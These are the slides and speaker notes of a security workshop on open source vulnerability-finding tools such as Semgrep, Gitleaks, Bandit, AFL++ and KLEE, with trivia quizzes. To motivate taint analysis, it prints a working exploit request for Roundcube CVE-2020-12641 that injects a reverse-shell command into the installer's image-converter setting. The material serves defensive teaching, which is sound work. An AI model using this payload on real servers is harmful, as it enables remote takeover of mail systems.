The Open Source Fortress

Goals

  • Finding a 0-day in the XZ codebase
  • Automating the 0-day exploitation to break in bug bounty targets at scale
  • Familiarizing yourself with unstable academic SotA PoCs and paid products

House rules

  • You watch. I do.
  • All the questions should be put in the end of the workshop.
  • The people staying until the end will have discount codes for the paid products.

center

Excited?

center

Buddy, the 0-day sounds cool. But paid products?

Goals v2.0

  • Finding vulnerabilities in a Goat-like application
  • Experimenting with stable, non-SotA, and effective open source tools
  • Understanding their advantages and disadvantages

House rules v2.0

  • You do. I watch.
  • You can ask your questions at any moment of time.
  • Finding vulns and proposing patches will result in prizes!

Setup?

ossfortress.io/showcases/dc

center

Trivia 101 I

  • Prerequisite: You need to love improvisation.
  • Because Kahoot has a shitty pricing model, We'll use a classic form.
  • You gain points by:
    • Giving correct answers to trivia questions
    • Submitting patch ideas
  • We have 3 winners.
  • The books are randomly allocated at first, but you can exchange them between you.

@iosifache

  • Ex-builder at MutableSecurity
  • Ex-security engineer @ Romanian Army and Canonical
  • Security engineer in Snap Inc.
  • Open source maintainer
  • GSoC mentor for OpenPrinting
  • Enthusiast of good coffee, long runs/hikes, and quality time

Roundcube Webmail

center

center

$ git clone https://github.com/roundcube/roundcubemail
[...]
$ cd roundcubeemail
$ scc . | head -8
───────────────────────────────────────────────────────────────────────────────
Language                 Files     Lines   Blanks  Comments     Code Complexity
───────────────────────────────────────────────────────────────────────────────
PHP                        526    123939    18225     28447    77267      13323
SQL                        110      2642      419       238     1985          0
JavaScript                 100     29353     3617      2800    22936       4827
HTML                        50      2738      304        31     2403          0
Shell                       21      2432      345        50     2037        323

center

center

Trivia #1: What mechanism was missed by the Roundcube developers in the installation routine?

  1. Sanitizing the configuration
  2. Limiting the number of requests to the server
  3. Discarding the images in a non-standard format
  4. Receiving external emails

Exploitation chain

  • The attacker sends a POST request to the installer:

    POST /roundcube/installer/index.php HTTP/1.1
    Host: 192.168.243.153
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1049
    
    _step=2&_product_name=Roundcube+Webmail&***TRUNCATED***&submit=UPDATE+CONFIG&
    _im_convert_path=php+-r+'$sock%3dfsockopen("127.0.0.1",4444)%3b
    exec("/bin/bash+-i+<%263+>%263+2>%263")%3b'+%23
    
  • The attacker sends an email containing an image of non-standard format (e.g., TIFF).

  • Roundcube will try to convert the image to JPG.

  • The command stored in _im_convert_path will be executed.

  • The attacker will have a reverse shell.

CVE-2020-12641

But ... Was it preventable?

Yes, but ..

Not with stock linters or scanners.

private static function getCommand($opt_name)
{
    static $error = [];

    $cmd = rcube::get_instance()->config->get($opt_name);

    if (empty($cmd)) {
        return false;
    }

    if (preg_match('/^(convert|identify)(\.exe)?$/i', $cmd)) {
        return $cmd;
    }

    // Executable must exist, also disallow network shares on Windows
    if ($cmd[0] != "\\" && file_exists($cmd)) {
        return $cmd;
    }

    if (empty($error[$opt_name])) {
        rcube::raise_error("Invalid $opt_name: $cmd", true, false);
        $error[$opt_name] = true;
    }

    return false;
}

From program/lib/Roundcube/rcube_image.php

Trivia #2: What technique could have been feasible for discovering the vulnerability?

  1. Fuzzing
  2. Taint analysis
  3. Linting
  4. Dependency scanning
rules:
  - id: return-unsanitised-config
    languages:
      - php
    message: A value taken from the configuration is returned without sanitisation.
    mode: taint
    pattern-sources:
      - patterns:
        - pattern: rcube::get_instance()->config->get($KEY);
    pattern-sanitizers:
      - pattern: escapeshellcmd(...)
    pattern-sinks:
    - patterns:
      - pattern-regex: "return"
    severity: ERROR

A Semgrep rule using taint tracking


private static function getCommand($opt_name)
{
    static $error = [];

    $cmd = rcube::get_instance()->config->get($opt_name);

    if (empty($cmd)) {
        return false;
    }

    if (preg_match('/^(convert|identify)(\.exe)?$/i', $cmd)) {
        return $cmd;
    }

    // Executable must exist, also disallow network shares on Windows
    if ($cmd[0] != "\\" && file_exists($cmd)) {
        return $cmd;
    }

    [...]
}

The Open Source Fortress

  • Collection of OSS tools that can be used to proactively detect vulnerabilities
  • ossfortress.io/guide as the guide that we'll follow

center

But why open source?

  • Second layer of security when used with paid products
  • Replacement for paid products
  • Lower engineering effort compared with in-house solutions
  • Default collaboration

center

Further defensive activities

The examples are from the Log4Shell vulnerability in Log4j.

Further offensive activities

  • Exploit writing
    • Attack vector: through VMware Horizon
    • Mitigation bypass: T1036.004
    • Weaponisation: T1573.001
  • Exploitation

As reported by CISA in AA22-174A

Sand Castle

  • Vulnerable-by-design codebase
  • "lightweight piece of software that runs on a Debian-based server and allows users to control it through their browsers"
  • On-premise deployment
  • Written in Python and C
  • 12+ embedded vulnerabilities

center

Analysis infrastructure

  • Docker Compose infrastructure
  • Services
    • Sand Castle
    • OWASP Threat Dragon
    • Coder
    • All static analysers
    • AFL++
    • KLEE

center

Threat modelling

Trivia #3: What steps are part of a threat modelling process?

  1. Asset identification
  2. Creation of remediation plans in case of a cyberattack
  3. Cyber insurance procurement
  4. Threat identification

Trivia #4: Which country was the first to make threat modelling mandatory in certain conditions?

  1. Singapore
  2. Germany
  3. USA
  4. Switzerland

OWASP Threat Dragon

  • Threat modelling tool backed by OWASP
  • Usual process
    1. Threat model creation
    2. Diagram creation: STRIDE, CIA
    3. Asset representation: stores, process, actor, data flow, trust boundaries
    4. Manual threat identification, with type, status, score, priority, description, and mitigation

Practice 🔩

center

Code querying

Trivia #5: What is the purpose of a tool for code querying?

  1. Writing code implementing query languages such as SQL
  2. Storing code snippets in databases for debugging purposes
  3. Finding lines of code that match a specific criteria
  4. Offering search engines the ability to search websites for code storage (e.g., GitHub, GitLab)

Trivia #6: What code querying tools are used nowadays for matching specific lines of code?

  1. Literals
  2. Regex
  3. Partial ASTs
  4. Tool-specific query languages

Semgrep

  • (Partially) open-source code scanner
  • Support for 30+ programming languages
  • No prior build requirements
  • No DSL for rules
  • Default or third-party rules

Practice 🔩

center

Secret scanning

Trivia #7: What can be considered a secret?

  1. (Certain kinds of) API keys
  2. Credentials
  3. GitHub personal tokens
  4. Application build number

Trivia #8: How can artefacts that may be a secret be searched in a codebase?

  1. Short, high-entropy data
  2. Specific formats such as ghp_(\w){40}
  3. Prerequisites for running the application, usually mentioned in the docs
  4. Git history

Gitleaks

  • Detector for hard-coded secrets
  • Analysis of the entire Git history
  • Support for baselines and custom formats of secrets

Practice 🔩

center

Dependency scanning

Trivia #9: Should all the vulnerable dependencies be updated immediately?

  1. No, because some of them are not reachable or exploitable
  2. No, because development velocity is more important than absolute security
  3. Yes, because they are vulnerabilities in the code we are embedding in our codebase
  4. Yes, because it's unacceptable to have warnings from GitHub's Dependabot

Trivia #10: What files can be searched to identify the dependencies of a program?

  1. package.json
  2. The source files and their includes
  3. poetry.lock
  4. /etc/apache2/httpd.conf

Dependency scanning

  • Iterating through all dependencies for finding their vulnerabilities
  • Usage of the dependencies' declaration list

OSV-Scanner

Practice 🔩

center

Linting

Trivia #11: What can a linter check?

  1. Formatting
  2. Developers' productivity
  3. Grammar (for example, non-inclusive expressions)
  4. Security

Trivia #12: What are valid approaches for automating the run of a linter?

  1. On quality gates inside the CI/CD
  2. Locally, in the development environment
  3. On Git's pre-commit hooks
  4. On each change of a file in an IDE

Bandit

  • Linter for Python
  • Abstract syntax tree representation of the code
  • Custom modules for:
    • Patterns of suspicious code
    • Deny lists of imports and function calls
    • Report generation
  • Support for baselines

Practice 🔩

center

Fuzzing

Trivia #13: What does a fuzzer do?

  1. Trying to deduce what code is unused
  2. Running the program with random input and watching for crashes
  3. Running the unit tests in a random order and watching for crashes
  4. Placing random data in the registers during execution and watching for crashes

Trivia #14: What metrics are used to judge how good a fuzzer is?

  1. Speed (executions/second)
  2. Filesystem interactions (interactions/second)
  3. Efficiency (coverage/second)
  4. Effectiveness (crash/second)

center

From AdaCore's "Finding Vulnerabilities using Advanced Fuzz testing and AFLplusplus v3.0"

AFL++

Practice 🔩

center

Symbolic execution

Trivia #15: What does symbolic execution do?

  1. Executing the application inside an emulator with an obscure architecture
  2. Investigating all paths in the control flow graph (CFG) by replacing the concrete values with symbolic ones
  3. Optimising binaries to run faster in production environments
  4. Running the program multiple times with random inputs

Trivia #16: What are the main components of a symbolic execution engine?

  1. Sources
  2. Sinks
  3. Patterns
  4. Secrets
int f(int a, int b){
    int x = 1, y = 0;

    if (a != 0) {
        y = x + 3;
        if b == 0 {
            x = 2 * (a + b);
        }
    }

    return (a + b) / (x - y);
}

center

From symflower's "What is symbolic execution for software programs"

KLEE

  • Generic symbolic execution with security use cases
  • Built on LLVM

Thanks, Cristian Cadar!

center

Practice 🔩

Security tooling automation

~8 billion people on Earth

~30k people at DEF CON

~30 people on this workshop

We probably have some things in common 😏, so let's not become strangers!

Connect form

Feedback form

Trivia #17: What is Ubuntu?

  1. Southern African Christian perception of an African philosophy
  2. Operating system
  3. Bantu word
  4. Philosophical concept

center

"Ubuntu does not mean that people should not address themselves, the question, therefore, is, are you going to do so in order to enable the community around you to be able to improve." - Nelson Mandela

center

Do security-focused work!

  • Create a threat model.
  • Do a security review and report your findings.
  • Implement new security mitigations.
  • Propose or backport patches.
  • Create new workflows for security scanning.
  • Integrate the project in OSS-Fuzz.

center

Support!

  • Give it a GitHub star.
  • Share it with your friends or followers.
  • Write a short feedback email to the maintainers.

center

ossfortress.io

- Before starting with the practical part, let's look at an example.

- Trying to gauge the adoption of the tool - Steady increase of stars

- What is Shodan? - 161k discovered hosts

- Familiar for owners of home labs - The web installation page of Roundcube - Plug the details in the browser, and they will be stored on the server.

- If the instance is exposed on the Internet, then anyone can set the details.

- The reason: custom function which are not known by default by the standard tools

- Approach for output sanitisation (i.e., detecting if the configuration is returned without sanitisation) - Other approaches: input sanitisation (.e., not storing in the configuration file without a prior sanitisation)

- Seeing later how can we run Semgrep - Errors generated for the lines in red

Let's tackle the elephant in the room.

- Log4j - CVSS of 10 (critical) - CWE-502: Deserialisation of Untrusted Data - Links in the presentation, which will be accessible after the conference

- Identifiers from MITRE ATT&CK matrix - Symmetrically-encrypted channel communication - Mimicking a legit service

`scanf`, `scanf\(.*\)`, method call as revealed by the AST (as Joern does)

- Considering the program on left - The right part is what a symbolic execution engine will see.

- Every engineering likes some automations.

- Open source workshop, about open source tools, so no corporate incentives involved - Spare time contributions - For personal development - Just 2 minutes to fill the form

I'm not promoting Ubuntu here. You may say that some of their decisions are questionable, but this is a discussion for another time. I think that Mark did an awesome job choosing the name of the operating system because the Ubuntu philosophy is also intrinsically embedded in open source.

- As mentioned at the beginning, these are not SotAs, so there is a lot of space for improvement. - In this way, I can bet that the whole community will be grateful for your work.

- If there is a single thing that I want you to remember is this website. - One can find there the presentation, exercises, a cheatsheet and more.